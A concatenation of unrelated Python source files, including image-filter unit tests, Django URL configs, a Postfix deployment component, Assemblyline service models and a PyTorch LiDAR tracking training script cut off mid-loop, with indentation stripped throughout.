output.mirrorOuterLayersToBorder(False)
output.updateHaloRegions()
return output
def doFilterTestWithHalo(self, haloSz=0):
if (isinstance(haloSz, int) or ((sys.version_info.major < 3) and isinstance(haloSz, long))):
if (haloSz < 0):
haloSz = 0
haloSz = sp.array((haloSz,)*3)
imgDds = mango.data.gaussian_noise(shape=self.imgShape, mean=32000, stdd=4000.0, mtype="tomo", halo=haloSz)
slc = []
for d in range(len(haloSz)):
slc.append(slice(haloSz[d], imgDds.asarray().shape[d]-haloSz[d]))
slc = tuple(slc)
se = mango.image.sphere_se(radius=1.0)
mfDds = self.doMangoFiltering(imgDds, se)
sfDds = self.doScipyFiltering(imgDds, se)
self.assertTrue(sp.all(imgDds.dtype == mfDds.dtype))
self.assertTrue(sp.all(imgDds.mtype == mfDds.mtype), "%s != %s" % (imgDds.mtype, mfDds.mtype))
self.assertTrue(sp.all(imgDds.halo == mfDds.halo))
self.assertTrue(sp.all(imgDds.shape == mfDds.shape))
self.assertTrue(sp.all(imgDds.origin == mfDds.origin), "%s != %s" % (imgDds.origin, mfDds.origin))
self.assertTrue(sp.all(imgDds.mpi.shape == mfDds.mpi.shape))
logger.info("imgDds min = %s, imgDds max = %s" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))
logger.info("mfDds min = %s, mfDds max = %s" % (np.min(mfDds.asarray()[slc]), np.max(mfDds.asarray()[slc])))
logger.info("sfDds min = %s, sfDds max = %s" % (np.min(sfDds.asarray()[slc]), np.max(sfDds.asarray()[slc])))
logger.info("num non-zero mfDds-sfDds = %s" % sp.sum(sp.where((mfDds.asarray()[slc]-sfDds.asarray()[slc]) != 0, 1, 0)))
logger.info(
"abs(sfDds-mfDds) min = %s, abs(sfDds-mfDds) max = %s"
%
(
np.min(sp.absolute(mfDds.asarray()[slc]-sfDds.asarray()[slc])),
np.max(sp.absolute(mfDds.asarray()[slc]-sfDds.asarray()[slc]))
)
)
tmpDds = mango.copy(mfDds, dtype="int32")
tmpDds.updateHaloRegions()
tmpDds.mirrorOuterLayersToBorder(False)
self.assertLessEqual(
np.max(sp.absolute(tmpDds.asarray()[slc] - sfDds.asarray()[slc])),
self.diffTol
)
self.assertLessEqual(
np.max(sp.absolute(tmpDds.asarray() - sfDds.asarray())),
self.diffTol
)
imgDds = mango.data.gaussian_noise(shape=self.imgShape, mean=5000, stdd=4500, dtype="int32", halo=haloSz, origin=(-32,8,64))
se = mango.image.sphere_se(radius=3.0)
mfDds = self.doMangoFiltering(imgDds, se)
sfDds = self.doScipyFiltering(imgDds, se)
self.assertTrue(sp.all(imgDds.dtype == mfDds.dtype))
#self.assertTrue(sp.all(imgDds.mtype == mfDds.mtype))
self.assertTrue(sp.all(imgDds.halo == mfDds.halo))
self.assertTrue(sp.all(imgDds.shape == mfDds.shape))
self.assertTrue(sp.all(imgDds.origin == mfDds.origin), "%s != %s" % (imgDds.origin, mfDds.origin))
self.assertTrue(sp.all(imgDds.mpi.shape == mfDds.mpi.shape))
logger.info("imgDds min = %s, imgDds max = %s" % (np.min(imgDds.asarray()), np.max(imgDds.asarray())))
logger.info("mfDds min = %s, mfDds max = %s" % (np.min(mfDds.asarray()[slc]), np.max(mfDds.asarray()[slc])))
logger.info("sfDds min = %s, sfDds max = %s" % (np.min(sfDds.asarray()[slc]), np.max(sfDds.asarray()[slc])))
logger.info("num non-zero mfDds-sfDds = %s" % sp.sum(sp.where((mfDds.asarray()[slc]-sfDds.asarray()[slc]) != 0, 1, 0)))
logger.info(
"abs(sfDds-mfDds) min = %s, abs(sfDds-mfDds) max = %s"
%
(
np.min(sp.absolute(mfDds.asarray()-sfDds.asarray())),
np.max(sp.absolute(mfDds.asarray()-sfDds.asarray()))
)
)
self.assertLessEqual(
np.max(sp.absolute(mfDds.asarray()[slc] - sfDds.asarray()[slc])),
self.diffTol
)
self.assertLessEqual(
np.max(sp.absolute(mfDds.asarray() - sfDds.asarray())),
self.diffTol
)
class _NeighbourhoodFilterTestImpl:
def testStrideAndOffset(self):
org = sp.array((-122,333,117), dtype="int32")
shp = sp.array((64,65,67), dtype="int32")
imgDds = mango.data.gaussian_noise(shape=shp, origin=org, mean=5000, stdd=4500, dtype="int32")
se = mango.image.order_se(order=4)
boffset = (1,2,-3)
mfDds = self.doMangoFiltering(imgDds, se, boffset=boffset)
rootLogger.info("=====boffset=%s=======" % (boffset,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == (org + boffset)))
self.assertTrue(sp.all(mfDds.shape == (shp - boffset)))
eoffset = (-3,1,-2)
mfDds = self.doMangoFiltering(imgDds, se, eoffset=eoffset)
rootLogger.info("=====eoffset=%s=======" % (eoffset,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == (org)))
self.assertTrue(sp.all(mfDds.shape == (shp + eoffset)))
mfDds = self.doMangoFiltering(imgDds, se, boffset=boffset, eoffset=eoffset)
rootLogger.info("=====boffset=%s, eoffset=%s=======" % (boffset, eoffset,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == (org + boffset)))
self.assertTrue(sp.all(mfDds.shape == (shp -boffset + eoffset)))
stride = (2,4,3)
mfDds = self.doMangoFiltering(imgDds, se, stride=stride)
rootLogger.info("=====stride=%s=======" % (stride,))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == np.round(sp.array(org,dtype="float64")/stride)))
self.assertTrue(sp.all(mfDds.shape == sp.ceil(shp/sp.array(stride, dtype="float32"))))
stride = (2,4,3)
mfDds = self.doMangoFiltering(imgDds, se, stride=stride, boffset=boffset, eoffset=eoffset)
rootLogger.info("=====stride=%s, boffset=%s, eoffset=%s=======" % (stride,boffset,eoffset))
rootLogger.info("imgDds.origin=%s, imgDds.shape=%s" % (imgDds.origin, imgDds.shape))
rootLogger.info("mfDds.origin=%s, mfDds.shape=%s" % (mfDds.origin, mfDds.shape))
self.assertTrue(sp.all(mfDds.origin == np.round(sp.array((org+boffset), dtype="float64")/stride)))
self.assertTrue(sp.all(mfDds.shape == sp.ceil((shp-boffset+eoffset)/sp.array(stride, dtype="float32"))))
def testFilteringHalo0(self):
self.doFilterTestWithHalo(0)
def testFilteringHalo2(self):
self.doFilterTestWithHalo(2)
def testFilteringHalo5(self):
self.doFilterTestWithHalo(5)
class MeanFilterTest(NeighbourhoodFilterTest,_NeighbourhoodFilterTestImpl):
def setUp(self):
NeighbourhoodFilterTest.setUp(self)
self.diffTol = 1
def callMangoFilter(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = mango.image.mean_filter(input, se, mode=self.mode, stride=stride, boffset=boffset, eoffset=eoffset)
return output
def callScipyFilter(self, inDds, se):
footprint = se.toFootprint()
kernel = sp.zeros(footprint.shape, dtype="float64")
kernel[sp.where(footprint)] = 1.0
rootLogger.info("Num footprint elements = %s" % sp.sum(sp.where(footprint, 1, 0)))
kernel /= sp.sum(kernel)
outputArr = sp.ndimage.convolve(inDds.asarray(), weights=kernel, mode=self.mode)
return outputArr
class MedianFilterTest(NeighbourhoodFilterTest,_NeighbourhoodFilterTestImpl):
def setUp(self):
NeighbourhoodFilterTest.setUp(self)
self.diffTol = 0
def callMangoFilter(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = mango.image.median_filter(input, se, mode=self.mode, stride=stride, boffset=boffset, eoffset=eoffset)
return output
def callScipyFilter(self, inDds, se):
footprint = se.toFootprint()
rootLogger.info("Num footprint elements = %s" % sp.sum(sp.where(footprint, 1, 0)))
rootLogger.info("Footprint.shape = %s" % (footprint.shape,))
outputArr = sp.ndimage.median_filter(inDds.asarray(), footprint=footprint, mode=self.mode)
return outputArr
class ConvolutionFilterTest(NeighbourhoodFilterTest,_NeighbourhoodFilterTestImpl):
def setUp(self):
NeighbourhoodFilterTest.setUp(self)
self.diffTol = 1
def getWeights(self, se):
shape = se.toFootprint().shape
return mango.image.discrete_gaussian_kernel(sigma=np.min(shape)/(2*3.25))
def callMangoFilter(self, input, se, stride=(1,1,1), boffset=(0,0,0), eoffset=(0,0,0)):
output = mango.image.convolve(input, self.getWeights(se), mode=self.mode, stride=stride, boffset=boffset, eoffset=eoffset)
return output
def callScipyFilter(self, inDds, se):
kernel = self.getWeights(se)
rootLogger.info("Num kernel elements = %s" % sp.sum(sp.where(kernel, 1, 0)))
rootLogger.info("kernel.shape = %s" % (kernel.shape,))
outputArr = sp.ndimage.convolve(inDds.asarray(), weights=kernel, mode=self.mode)
return outputArr
if __name__ == "__main__":
mpi.initialiseLoggers(
[__name__, "mango.mpi", "mango.image", "mango.imageTest"],
logLevel=logging.INFO
)
unittest.main()
|
from django.conf.urls import url
from misago.search.views import landing, search
urlpatterns = [
url(r'^search/$', landing, name='search'),
url(r'^search/(?P<search_provider>[-a-zA-Z0-9]+)/$', search, name='search'),
]
|
from django.conf import settings
from django.conf.urls.static import static
from django.contrib import admin
from django.urls import path,include
from . import views
urlpatterns = [
path('admin/', admin.site.urls),
path('', views.home,name='home'),
path('badge/', include('badge.urls')),
]+ static(settings.MEDIA_URL ,document_root=settings.MEDIA_ROOT)
|
from functools import partial
from operator import is_not
import numpy as np
import pandas as pd
def nutrient_color(value):
return 'text-success' if value <= 0.15 else 'text-danger'
def make_list(x):
return list(filter(partial(is_not, np.nan), list(x)))
def rank_suffix(i):
i = i + 1
if i >= 11 and 11 <= int(str(i)[-2:]) <= 13:
return f'{i}th'
remainder = i % 10
if remainder == 1:
return f'{i}st'
elif remainder == 2:
return f'{i}nd'
elif remainder == 3:
return f'{i}rd'
else:
return f'{i}th'
def build_top_x_sentence(s: pd.Series, x):
if x > s.nunique():
x = s.nunique()
common_categories = s.value_counts().head(x).to_dict()
if x == 1:
return f'{s.unique()} ({common_categories[s.unique()]} products)'
sen = ', '.join([f'{key} ({common_categories[key]} products)' for key in common_categories])
sen_par = sen.rpartition(', ')
return sen_par[0] + ', and ' + sen_par[-1]
# This gets the 3 most common ingredients but does not preprocess the ingredient lists
def build_top_ingredient_sentence(ingredients: pd.Series):
common_ingredients = pd.Series(' '.join(ingredients.fillna('').str.lower().tolist())
.split(',')).value_counts().head(3).index.tolist()
if len(common_ingredients) >= 3:
return f'The three most common ingredients in this category are \
{common_ingredients[0]}, {common_ingredients[1]}, and {common_ingredients[2]}.'
elif len(common_ingredients) == 2:
return f'The two most common ingredients in this category are \
{common_ingredients[0]} and {common_ingredients[1]}.'
# Seems unlikely to only have one ingredient, note it can still have 0 ingredients in which case this sentence
# will not be displayed
elif len(common_ingredients) == 1:
return f'The only ingredient in this category is {common_ingredients[0]}.'
|
from batou.component import Component, Attribute
from batou.lib.file import File
from batou.utils import Address
from batou_ext.keypair import KeyPair
import socket
import os
def resolve_v6(address):
return socket.getaddrinfo(
address.connect.host,
address.connect.port,
socket.AF_INET6)[0][4][0]
class PFAPostfix(Component):
address = Attribute(Address, 'localhost:25')
def configure(self):
self.address.listen.host_v6 = resolve_v6(self.address)
self.db = self.require_one('pfa::database')
self.keypair = self.require_one('keypair::mail')
self.provide('postfix', self.address)
self += File(
'/etc/postfix/myhostname',
content=self.address.connect.host)
self += File(
'/etc/postfix/main.d/40_local.cf',
source=self.resource('local.cf'))
self += File(
'postfixadmin_virtual_alias',
source=self.resource('postfixadmin_virtual_alias'))
self += File(
'postfixadmin_virtual_domains',
source=self.resource('postfixadmin_virtual_domains'))
self += File(
'postfixadmin_virtual_sender_login',
source=self.resource('postfixadmin_virtual_sender_login'))
self += File(
'postfixadmin_virtual_mailboxes',
source=self.resource('postfixadmin_virtual_mailboxes'))
def resource(self, filename):
return os.path.join(
os.path.dirname(__file__),
'postfix',
filename)
|
from ctypes import byref
from ctypes import c_uint
from pyglet import gl
from .vertex import Vertices
class VertexArrayObject:
"""
A vertex array object (VAO) is a kind of context object for a bunch of
vertex buffers and related settings.
"""
def __init__(self, vertices_class=Vertices):
self.name = gl.GLuint()
self.vertices_class = vertices_class
gl.glCreateVertexArrays(1, byref(self.name))
def __enter__(self):
gl.glBindVertexArray(self.name)
def __exit__(self, exc_type, exc_val, exc_tb):
gl.glBindVertexArray(0)
def create_vertices(self, data):
"Just a convenience."
return self.vertices_class(self, data)
def delete(self):
gl.glDeleteVertexArrays(1, (c_uint*1)(self.name))
def __del__(self):
try:
self.delete()
except ImportError:
pass
|
from typing import List, Optional as Opt
from assemblyline import odm
from assemblyline.common import forge
from assemblyline.common.constants import DEFAULT_SERVICE_ACCEPTS, DEFAULT_SERVICE_REJECTS
Classification = forge.get_classification()
@odm.model(index=False, store=False)
class EnvironmentVariable(odm.Model):
name = odm.Keyword()
value = odm.Keyword()
@odm.model(index=False, store=False)
class DockerConfig(odm.Model):
allow_internet_access: bool = odm.Boolean(default=False)
command: Opt[List[str]] = odm.Optional(odm.List(odm.Keyword()))
cpu_cores: float = odm.Float(default=1.0)
environment: List[EnvironmentVariable] = odm.List(odm.Compound(EnvironmentVariable), default=[])
image: str = odm.Keyword() # Complete name of the Docker image with tag, may include registry
registry_username = odm.Optional(odm.Keyword()) # The username to use when pulling the image
registry_password = odm.Optional(odm.Keyword()) # The password or token to use when pulling the image
ports: List[str] = odm.List(odm.Keyword(), default=[])
ram_mb: int = odm.Integer(default=512)
ram_mb_min: int = odm.Integer(default=128)
@odm.model(index=False, store=False)
class PersistentVolume(odm.Model):
mount_path = odm.Keyword() # Path into the container to mount volume
capacity = odm.Keyword() # Bytes
storage_class = odm.Keyword()
@odm.model(index=False, store=False)
class DependencyConfig(odm.Model):
container = odm.Compound(DockerConfig)
volumes = odm.Mapping(odm.Compound(PersistentVolume), default={})
@odm.model(index=False, store=False)
class UpdateSource(odm.Model):
name = odm.Keyword()
password = odm.Optional(odm.Keyword(default=""))
pattern = odm.Optional(odm.Keyword(default=""))
private_key = odm.Optional(odm.Keyword(default=""))
ca_cert = odm.Optional(odm.Keyword(default=""))
ssl_ignore_errors = odm.Boolean(default=False)
proxy = odm.Optional(odm.Keyword(default=""))
uri = odm.Keyword()
username = odm.Optional(odm.Keyword(default=""))
headers = odm.List(odm.Compound(EnvironmentVariable), default=[])
default_classification = odm.Classification(default=Classification.UNRESTRICTED)
@odm.model(index=False, store=False)
class UpdateConfig(odm.Model):
# build_options = odm.Optional(odm.Compound(DockerfileConfig)) # If we are going to build a container, how?
generates_signatures = odm.Boolean(index=True, default=False)
method = odm.Enum(values=['run', 'build']) # Are we going to run or build a container?
run_options = odm.Optional(odm.Compound(DockerConfig)) # If we are going to run a container, which one?
sources = odm.List(odm.Compound(UpdateSource), default=[]) # Generic external resources we need
update_interval_seconds = odm.Integer() # Update check interval in seconds
wait_for_update = odm.Boolean(default=False)
@odm.model(index=False, store=False)
class SubmissionParams(odm.Model):
default = odm.Any()
name = odm.Keyword()
type = odm.Enum(values=['str', 'int', 'list', 'bool'])
value = odm.Any()
list = odm.Optional(odm.Any())
@odm.model(index=True, store=False)
class Service(odm.Model):
# Regexes applied to assemblyline style file type string
accepts = odm.Keyword(store=True, default=DEFAULT_SERVICE_ACCEPTS)
rejects = odm.Optional(odm.Keyword(store=True, default=DEFAULT_SERVICE_REJECTS))
category = odm.Keyword(store=True, default="Static Analysis", copyto="__text__")
config = odm.Mapping(odm.Any(), default={}, index=False, store=False)
description = odm.Text(store=True, default="NA", copyto="__text__")
default_result_classification = odm.ClassificationString(default=Classification.UNRESTRICTED)
enabled = odm.Boolean(store=True, default=False)
is_external = odm.Boolean(default=False)
licence_count = odm.Integer(default=0)
name = odm.Keyword(store=True, copyto="__text__")
version = odm.Keyword(store=True)
# Should the result cache be disabled for this service
disable_cache = odm.Boolean(default=False)
stage = odm.Keyword(store=True, default="CORE", copyto="__text__")
submission_params: SubmissionParams = odm.List(odm.Compound(SubmissionParams), index=False, default=[])
timeout = odm.Integer(default=60)
docker_config: DockerConfig = odm.Compound(DockerConfig)
dependencies = odm.Mapping(odm.Compound(DependencyConfig), default={})
update_channel: str = odm.Enum(values=["stable", "rc", "beta", "dev"], default='stable')
update_config: UpdateConfig = odm.Optional(odm.Compound(UpdateConfig))
|
#! /usr/bin/env python
#
##plotting exercise
##created by Nate
##06/24/2019
import numpy as np
import matplotlib.pyplot as plt
def vrot(x, m):
return x / pow(1+x**m, 1/m)
x =np.linspace(0,10,1000)
ve = 1-np.exp(-x)
v7 = vrot(x,0.75)
v1 = vrot(x,1)
v2 = vrot(x,2)
v4 = vrot(x,4)
v100 = vrot(x,100)
#plt.plot(x, v7, '-r', label='m=0.75')
plt.plot(x, v1, '-r', label='m=1')
#plt.plot(x, v1_5, '-m', label='m=1.5')
plt.plot(x, v2, '-k', label='m=2')
plt.plot(x, v4, '-b', label='m=4')
#plt.plot(x, v10, '-g', label='m=10')
#plt.plot(x, v25, '-c', label='m=25')
plt.plot(x, v100, '-g', label='m=100')
plt.plot(x, ve, '--m', label='exp')
plt.title('Model Rotation Curves: $V/V_0 = r / (1+r^m)^{1/m}, r=R/R_0$')
plt.xlabel('$R/R_O$')
plt.ylabel('$V/V_O$')
plt.legend(loc='lower right')
plt.grid()
plt.savefig('model_rot_curve.pdf')
plt.show()
|
from discord.ext import commands
from discord.message import Message
class DiscordLimb:
""" Effectively contains documentation for the useful pycord functions. """
@commands.Cog.listener()
async def on_ready(self)-> None:
""" Called when the client is done preparing the data received from Discord. Dont access API until this is called.
This function is not guaranteed to only be called once. This library implements reconnection logic and thus
will end up calling this event whenever a RESUME request fails.
"""
pass
@commands.Cog.listener()
async def on_message(self, message: Message) -> None:
""" Called when a message is received from Discord. """
pass
|
import sys
import numpy as np
I = np.array(sys.stdin.read().split(), dtype=np.int64)
n = I[0]
t = I[1 : 1 + n]
m = I[1 + n]
p, x = I[2 + n :].reshape(m, 2).T
def main():
default = np.sum(t)
res = default + (x - t[p - 1])
return res
if __name__ == "__main__":
ans = main()
print(*ans, sep="\n")
|
"""alie cli tests."""
from os import environ
from click.testing import CliRunner
from alie import cli
def test_main(tmpdir):
"""Sample test for main command."""
runner = CliRunner()
environ['ALIE_JSON_PATH'] = tmpdir.join('json').strpath
environ['ALIE_ALIASES_PATH'] = tmpdir.join('aliases').strpath
for i in range(10):
params = [f'test_quick_{i}', 'echo']
result = runner.invoke(cli.main, params)
assert 'CREATED' in result.output
params = ['test_quick_0']
result = runner.invoke(cli.main, params)
assert 'REMOVED' in result.output
result = runner.invoke(cli.main, [])
assert '[9 registered]' in result.output
result = runner.invoke(cli.main, ['hello'])
assert 'not registered' in result.output
params = [f'say-message', 'echo "$@"', '-f']
result = runner.invoke(cli.main, params)
assert 'CREATED' in result.output
params = [f'"clear console"', 'clear']
result = runner.invoke(cli.main, params)
assert 'CREATED' in result.output
result = runner.invoke(cli.main, [])
assert 'function ' in result.output
assert 'say-message' in result.output
assert 'clear_console' in result.output
|
import argparse
import os
import random
import time
import logging
import pdb
from tqdm import tqdm
import numpy as np
import scipy.io as sio
import torch
import torch.nn as nn
import torch.nn.parallel
import torch.backends.cudnn as cudnn
import torch.optim as optim
import torch.optim.lr_scheduler as lr_scheduler
import torch.utils.data
import torch.nn.functional as F
from torch.autograd import Variable
from model.loss import rpn_cross_entropy_balance, rpn_smoothL1, box_iou3d, focal_loss
from utils.anchors import cal_rpn_target, cal_anchors
from loader.Dataset import SiameseTrain
from model.model import SiamPillar
from config import cfg
parser = argparse.ArgumentParser()
parser.add_argument('--batchSize', type=int, default=4, help='input batch size')
parser.add_argument('--workers', type=int, default=0, help='number of data loading workers')
parser.add_argument('--nepoch', type=int, default=60, help='number of epochs to train for')
parser.add_argument('--ngpu', type=int, default=1, help='# GPUs')
parser.add_argument('--learning_rate', type=float, default=0.001, help='learning rate at t=0')
parser.add_argument('--input_feature_num', type=int, default = 0, help='number of input point features')
parser.add_argument('--data_dir', type=str, default = '/home/zhuangyi/SiamVoxel/kitti/training/', help='dataset path')
parser.add_argument('--category_name', type=str, default = 'Car', help='Object to Track (Car/Pedestrian/Van/Cyclist)')
parser.add_argument('--save_root_dir', type=str, default='results', help='output folder')
parser.add_argument('--model', type=str, default = '', help='model name for training resume')
parser.add_argument('--optimizer', type=str, default = '', help='optimizer name for training resume')
opt = parser.parse_args()
print (opt)
#torch.cuda.set_device(opt.main_gpu)
os.environ["CUDA_VISIBLE_DEVICES"] = '0,1'
opt.manualSeed = 1
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
save_dir = opt.save_root_dir
try:
os.makedirs(save_dir)
except OSError:
pass
logging.basicConfig(format='%(asctime)s %(message)s', datefmt='%Y/%m/%d %H:%M:%S', \
filename=os.path.join(save_dir, 'train.log'), level=logging.INFO)
logging.info('======================================================')
# 1. Load data
def tracking_collate(batch):
t_vox_feature = []
t_vox_number = []
t_vox_coordinate = []
s_vox_feature = []
s_vox_number = []
s_vox_coordinate = []
sample_box = []
for i, data in enumerate(batch):
t_vox_feature.append(data[0])
t_vox_number.append(data[1])
t_vox_coordinate.append(np.pad(data[2], ((0, 0), (1, 0)), mode = 'constant', constant_values = i))
s_vox_feature.append(data[3])
s_vox_number.append(data[4])
s_vox_coordinate.append(np.pad(data[5], ((0, 0), (1, 0)), mode = 'constant', constant_values = i))
sample_box.append(data[6])
return torch.from_numpy(np.concatenate(t_vox_feature, axis=0)).float(),\
torch.from_numpy(np.concatenate(t_vox_number, axis=0)).float(),\
torch.from_numpy(np.concatenate(t_vox_coordinate, axis=0)).float(),\
torch.from_numpy(np.concatenate(s_vox_feature, axis=0)).float(),\
torch.from_numpy(np.concatenate(s_vox_number, axis=0)).float(),\
torch.from_numpy(np.concatenate(s_vox_coordinate, axis=0)).float(),\
np.array(sample_box)
train_data = SiameseTrain(
input_size=1024,
path= opt.data_dir,
split='Train_tiny',
category_name=opt.category_name,
offset_BB=0,
scale_BB=1.25)
train_dataloader = torch.utils.data.DataLoader(
train_data,
batch_size=opt.batchSize,
shuffle=True,
num_workers=int(opt.workers),
collate_fn=tracking_collate,
pin_memory=True)
test_data = SiameseTrain(
input_size=1024,
path=opt.data_dir,
split='Valid_tiny',
category_name=opt.category_name,
offset_BB=0,
scale_BB=1.25)
test_dataloader = torch.utils.data.DataLoader(
test_data,
batch_size=int(opt.batchSize/2),
shuffle=False,
num_workers=int(opt.workers),
collate_fn=tracking_collate,
pin_memory=True)
print('#Train data:', len(train_data), '#Test data:', len(test_data))
print (opt)
# 2. Define model, loss and optimizer
model = SiamPillar()
if opt.ngpu > 1:
model = torch.nn.DataParallel(model, range(opt.ngpu))
if opt.model != '':
model.load_state_dict(torch.load(os.path.join(save_dir, opt.model)), strict=False)
model.cuda()
print(model)
optimizer = optim.Adam(model.parameters(), lr=opt.learning_rate, betas = (0.9, 0.999), eps=1e-08)
if opt.optimizer != '':
optimizer.load_state_dict(torch.load(os.path.join(save_dir, opt.optimizer)))
scheduler = lr_scheduler.StepLR(optimizer, step_size=12, gamma=0.2)
# 3. Training and testing
for epoch in range(opt.nepoch):
scheduler.step(epoch)
print('======>>>>> Online epoch: #%d, lr=%f <<<<<======' %(epoch, scheduler.get_lr()[0]))
# # 3.1 switch to train mode
torch.cuda.synchronize()
model.train()
train_mse = 0.0
timer = time.time()
batch_correct = 0.0
batch_cla_loss = 0.0
batch_reg_loss = 0.0
batch_cla_pos_loss = 0.0
batch_cla_neg_loss = 0.0
batch_label_loss = 0.0
batch_box_loss = 0.0
batch_num = 0.0
batch_iou = 0.0
batch_true_correct = 0.0
for i, data in enumerate(tqdm(train_dataloader, 0)):
if len(data[0]) == 1:
continue
torch.cuda.synchronize()
# 3.1.1 load inputs and targets
t_vox_feature, t_vox_number, t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate, sample_box = data
t_vox_feature = Variable(t_vox_feature, requires_grad=False).cuda()
t_vox_number = Variable(t_vox_number, requires_grad=False).cuda()
t_vox_coordinate = Variable(t_vox_coordinate, requires_grad=False).cuda()
s_vox_feature = Variable(s_vox_feature, requires_grad=False).cuda()
s_vox_number = Variable(s_vox_number, requires_grad=False).cuda()
s_vox_coordinate = Variable(s_vox_coordinate, requires_grad=False).cuda()
anchors = cal_anchors() # [cfg.FEATURE_HEIGHT, cfg.FEATURE_WIDTH, 2, 7]; 2 means two rotations; 7 means (cx, cy, cz, h, w, l, r)
pos_equal_one, targets = cal_rpn_target(sample_box, [cfg.FEATURE_WIDTH, cfg.FEATURE_HEIGHT], anchors, coordinate='lidar')
pos_equal_one = torch.from_numpy(pos_equal_one).float()
targets = torch.from_numpy(targets).float()
pos_equal_one = Variable(pos_equal_one, requires_grad=False).cuda()
targets = Variable(targets, requires_grad=False).cuda()
# 3.1.2 compute output
optimizer.zero_grad()
pred_conf, pred_reg = model(len(sample_box), t_vox_feature, t_vox_number, t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate)
cls_loss, pcls_loss, ncls_loss = focal_loss(pred_conf, pos_equal_one)
#cls_loss, pcls_loss, ncls_loss = rpn_cross_entropy_balance(pred_conf, pos_equal_one)
reg_loss = rpn_smoothL1(pred_reg, targets, pos_equal_one)
box_loss = box_iou3d(pred_reg, targets, anchors, pos_equal_one)
#loss_label = criterion_cla(pred_seed, label_cla)
#loss_box = criterion_box(pred_offset, label_reg)
#loss_box = (loss_box.mean(2) * label_cla).sum()/(label_cla.sum()+1e-06)
loss = cls_loss + 5 * reg_loss + 0.1 * box_loss
# 3.1.3 compute gradient and do SGD step
loss.backward()
optimizer.step()
torch.cuda.synchronize()
# 3.1.4 update training error
# estimation_cla_cpu = seed_pediction.sigmoid().detach().cpu().numpy()
# label_cla_cpu = label_cla.detach().cpu().numpy()
# correct = float(np.sum((estimation_cla_cpu[0:len(label_point_set),:] > 0.4) == label_cla_cpu[0:len(label_point_set),:])) / 169.0
# true_correct = float(np.sum((np.float32(estimation_cla_cpu[0:len(label_point_set),:] > 0.4) + label_cla_cpu[0:len(label_point_set),:]) == 2)/(np.sum(label_cla_cpu[0:len(label_point_set),:])))
train_mse = train_mse + loss.data*len(sample_box)
# batch_correct += correct
batch_cla_loss += cls_loss.data
batch_reg_loss += reg_loss.data
batch_cla_pos_loss += pcls_loss
batch_cla_neg_loss += ncls_loss
batch_box_loss += box_loss.data
# batch_num += len(label_point_set)
# batch_true_correct += true_correct
if (i+1)%20 == 0:
print('\n ---- batch: %03d ----' % (i+1))
print('cla_loss: %f, reg_loss: %f, cla_pos_loss: %f, cls_neg_loss: %f, box_loss: %f' %
(batch_cla_loss/20, batch_reg_loss/20, batch_cla_pos_loss/20, batch_cla_neg_loss/20, batch_box_loss/20))
# print('accuracy: %f' % (batch_correct / float(batch_num)))
# print('true accuracy: %f' % (batch_true_correct / 20))
batch_label_loss = 0.0
batch_cla_loss = 0.0
batch_reg_loss = 0.0
batch_cla_pos_loss = 0.0
batch_cla_neg_loss = 0.0
batch_box_loss = 0.0
batch_num = 0.0
batch_true_correct = 0.0
# time taken
train_mse = train_mse/len(train_data)
torch.cuda.synchronize()
timer = time.time() - timer
timer = timer / len(train_data)
print('==> time to learn 1 sample = %f (ms)' %(timer*1000))
torch.save(model.state_dict(), '%s/model_%d.pth' % (save_dir, epoch))
torch.save(optimizer.state_dict(), '%s/optimizer_%d.pth' % (save_dir, epoch))
# 3.2 switch to evaluate mode
torch.cuda.synchronize()
model.eval()
test_cla_loss = 0.0
test_reg_loss = 0.0
test_cla_pos_loss = 0.0
test_cla_neg_loss = 0.0
test_label_loss = 0.0
test_box_loss = 0.0
test_correct = 0.0
test_true_correct = 0.0
timer = time.time()
for i, data in enumerate(tqdm(test_dataloader, 0)):
torch.cuda.synchronize()
# 3.2.1 load inputs and targets
t_vox_feature, t_vox_number, t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate, sample_box = data
t_vox_feature = Variable(t_vox_feature, requires_grad=False).cuda()
t_vox_number = Variable(t_vox_number, requires_grad=False).cuda()
t_vox_coordinate = Variable(t_vox_coordinate, requires_grad=False).cuda()
s_vox_feature = Variable(s_vox_feature, requires_grad=False).cuda()
s_vox_number = Variable(s_vox_number, requires_grad=False).cuda()
s_vox_coordinate = Variable(s_vox_coordinate, requires_grad=False).cuda()
anchors = cal_anchors() # [cfg.FEATURE_HEIGHT, cfg.FEATURE_WIDTH, 2, 7]; 2 means two rotations; 7 means (cx, cy, cz, h, w, l, r)
pos_equal_one, targets = cal_rpn_target(sample_box, [cfg.FEATURE_WIDTH, cfg.FEATURE_HEIGHT], anchors, coordinate='lidar')
pos_equal_one = torch.from_numpy(pos_equal_one).float()
targets = torch.from_numpy(targets).float()
pos_equal_one = Variable(pos_equal_one, requires_grad=False).cuda()
targets = Variable(targets, requires_grad=False).cuda()
# 3.2.2 compute output
pred_conf, pred_reg = model(len(sample_box), t_vox_feature, t_vox_number,
t_vox_coordinate, \
s_vox_feature, s_vox_number, s_vox_coordinate)
cls_loss, pcls_loss, ncls_loss = focal_loss(pred_conf, pos_equal_one)
#cls_loss, pcls_loss, ncls_loss = rpn_cross_entropy_balance(pred_conf, pos_equal_one)
reg_loss = rpn_smoothL1(pred_reg, targets, pos_equal_one)
box_loss = box_iou3d(pred_reg, targets, anchors, pos_equal_one)
